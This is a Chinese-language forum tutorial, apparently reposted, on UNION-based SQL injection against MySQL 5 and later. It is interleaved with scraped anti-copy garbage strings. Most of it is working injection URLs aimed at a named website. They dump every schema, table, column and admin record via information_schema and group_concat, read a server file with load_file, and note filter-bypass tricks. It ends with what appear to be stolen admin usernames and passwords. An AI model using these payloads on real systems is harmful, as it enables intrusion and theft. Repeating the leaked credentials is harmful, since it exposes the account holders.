此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
/ W' f: D7 V" ^0 n8 k3 k0 p& U但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
- a7 J3 i4 d& C' k/ c! `" h) d4 T% t! U- `2 W. Q
" E- a) b% V. X优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入: J7 {, i* i. Q3 ^/ O/ P% L: \9 S- Y
" x9 I$ {+ l3 p: c
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
1 v3 ` p4 V& _. {' w
3 I2 \4 F9 t/ }! @7 q- s. X; X下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示5 F- @! I* O* K/ P& b6 k G
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
+ k# ?7 {- ]& S3 W9 \( l
9 E/ r- z# S# Dhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17. [8 @. o; B' M
7 O C& e* G! E. B7 M+ r# L
读出所有库:
6 F3 T3 X1 u t' z$ Shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
( Y0 m) Q: c7 g- v3 V" o/ i
* ~/ l. y3 I& d1 G* P Z4 d8 e2 e3 L1 Y+ ?2 b: Q, j4 F
& }' F! J& S! i* P
读出所有表:& r5 R7 `. ?* `
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()& }) I: Y0 m: |
' [1 i- B0 A- C! E
读出所有表字段:
% M. }9 i3 P: B6 } ^' Chttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)7 N. S q+ r( t! o: u; W
*/ (97,100,109,105,110)为admin的ascii码 依次类推
# O6 U z6 Z V9 S$ f& d& |
+ F7 Z6 N6 G: K$ R* e读出所有表字段里的内容:
! \0 V, P: j" I, n0 v, Chttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
/ Z9 I3 U' p/ N! `6 X4 b2 a& }3 g3 `$ N' W
- g) f* ]7 m' f& y1 f1 S7 v
- h0 x* g! d* D6 n, o( W; L7 K; T6 | h+ c+ D
+ B% g8 X, }6 ~( q- T$ N
# X7 B0 i9 \3 N2 D7 Nhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23 Z3 f0 E! `2 L0 ? ~# g
, h- V. i0 }. |0 i+ {8 p- n
" U1 r4 G6 M0 B& B% }
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%235 ~' W1 S7 ^1 i4 d8 J. j" M
2 p9 G- j' l8 Z) c, z% s' U
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%238 S' ?* r6 d8 U2 p
9 \2 `/ d2 R9 h. H; n. V8 p( l. g1 f( v8 t
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
. | G9 T1 i( I j* |, v4 K! V8 P6 `5 t
w5 M( C: c8 h) ^$ g) v webmaster:dzb521123,simlab:simadmin20043233: o$ T: p" ]" z
|